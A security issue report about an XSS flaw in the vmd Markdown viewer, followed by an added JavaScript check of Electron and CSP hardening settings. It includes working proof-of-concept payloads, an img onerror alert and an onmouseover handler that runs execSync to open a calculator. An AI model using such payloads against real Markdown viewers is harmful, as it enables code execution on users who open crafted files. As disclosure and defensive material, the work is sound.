Open notaisy opened 3 years ago
Hello, notaisy, and the other friends of this project.
Yeah, buddy, I've decided to investigate this case, and yeah, there is a big problem. Just as a stupid example: if some malicious guy sends an md file with malicious content, and the user is a real user ;) and doesn't know what is actually going on, the game is over for him.
https://streamable.com/oykc86 https://streamable.com/ngx2xm https://streamable.com/j7e13y
BR
Hi, I'd like to report a security vulnerability in the latest release:
Description: Cross-site scripting (XSS) vulnerability (also execute constructed malicious code)
Date: 2021.05.17
Version: v1.26.2~v1.34.0
Tested on: Windows10 & Mac
POC
The program does not properly handle the content of the code, causing the program to have a cross-site scripting vulnerability, which can also execute constructed malicious code
<img src=1 onerror=alert(/xss/)>
XSS
the file content code :
<img src=1 onerror=alert(/xss/)>
Execute malicious code
the file content code :
<a onmouseover="require('child_process').execSync('calc.exe')">POC Link</a>
Use vmd.exe to open the poc.md file to execute malicious code with the XSS vulnerability:
When vmd.exe opens the poc.md file, the PoC code is parsed in vmd.exe
<div class="markdown-body"> </div>
, so it is executed:
Use the PoC
<a onmouseover="require('child_process').execSync('open -na Calculator')">POC Link</a>
on Mac:
How to fix
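A defensive check for the settings that let an inline handler in rendered Markdown reach `require('child_process')`, added here as an example and not part of the original report or the project's code. It assumes the viewer is an Electron app that renders Markdown in a `BrowserWindow`; the function names, sample window options and sample CSP are hypothetical.

```javascript
'use strict';
// Required value for each webPreferences key (real Electron option names).
const REQUIRED = {
  nodeIntegration: false,  // no require() inside rendered pages
  contextIsolation: true,  // page scripts cannot reach preload internals
  sandbox: true,           // renderer runs in the OS-level sandbox
  webSecurity: true,       // keep the same-origin policy on
};

// Returns one finding per key that is not explicitly set to the required
// value. Unset counts as a finding: defaults differ between Electron versions.
function auditWebPreferences(windowOptions) {
  const prefs = (windowOptions && windowOptions.webPreferences) || {};
  const findings = [];
  for (const [key, want] of Object.entries(REQUIRED)) {
    if (prefs[key] !== want) {
      findings.push(`${key} must be ${want} (found ${String(prefs[key])})`);
    }
  }
  return findings;
}

// Inline handlers (onerror=, onmouseover=) are governed by script-src-attr,
// falling back to script-src, then default-src. Conservative check: true only
// if such a directive exists and has neither 'unsafe-inline' nor 'unsafe-hashes'.
function cspBlocksInlineHandlers(csp) {
  const directives = new Map();
  for (const part of csp.split(';')) {
    const [name, ...values] = part.trim().toLowerCase().split(/\s+/);
    if (name && !directives.has(name)) directives.set(name, values);
  }
  const effective = directives.get('script-src-attr') ||
    directives.get('script-src') || directives.get('default-src');
  if (!effective) return false; // no directive restricts scripts at all
  return !effective.some((v) => v === "'unsafe-inline'" || v === "'unsafe-hashes'");
}

// Constructed sample inputs (not taken from the project's source).
const WEAK_WINDOW = { webPreferences: { nodeIntegration: true } };
const HARDENED_WINDOW = { webPreferences: { ...REQUIRED } };
const VIEWER_CSP = "default-src 'none'; img-src 'self' data:; style-src 'self'";

console.log(auditWebPreferences(WEAK_WINDOW));
console.log(auditWebPreferences(HARDENED_WINDOW));
console.log(cspBlocksInlineHandlers(VIEWER_CSP));
```

These settings limit what an injected handler can do; the rendered HTML still needs to be sanitized so that handler attributes never reach the DOM.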